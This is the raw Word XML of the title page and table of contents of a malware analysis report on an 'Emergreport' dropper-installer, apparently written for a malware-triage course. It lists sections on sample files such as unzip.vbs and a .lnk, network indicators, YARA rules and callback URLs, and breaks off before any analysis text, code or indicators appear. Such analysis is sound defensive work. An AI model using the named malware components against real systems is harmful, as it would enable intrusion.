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diagrams/quickstyle1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+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diagrams/data1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/word/diagrams/layout1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+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160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3467100" cy="3572669"/>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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3467100" cy="3572669"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Practical Malware Analysis &amp; Triage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Malware Analysis Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Emergreport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Installer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
        <w:t>Nov 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
        <w:t xml:space="preserve">AcePhire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
        <w:t>| v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
          <w:color w:val="004e76"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc85207993"/>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:b w:val="off"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207993" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85207993 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>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"_Toc85207994" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85207994 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>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"_Toc85207995" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>High-Level Technical Summary</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85207995 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>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"_Toc85207996" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Malware Composition</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85207996 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>otely</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207997" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85207997 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>oneWitch</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207998" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>.png:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>unzip</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207998" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>vbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mergreport</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207998" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Emergreport</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207998" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>.lnk:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:b w:val="off"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85207999" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Basic Static Analysis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>7</w:t>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"_Toc85208000" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Basic Dynamic Analysis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85208004" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Network Indicators</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85208004" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Network Indicators</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>9</w:t>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"_Toc85208001" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Advanced Static Analysis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16</w:t>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"_Toc85208006" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Rules &amp; Signatures</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:b w:val="off"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85208007" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Appendices</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85208007 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="660"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85208008" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Yara Rules</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85208008 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Toc2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="660"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cs="Times New Roman" w:hAnsi="Montserrat Medium"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK \l "_Toc85208009" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Callback URLs</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc85208009 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc85207994"/>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
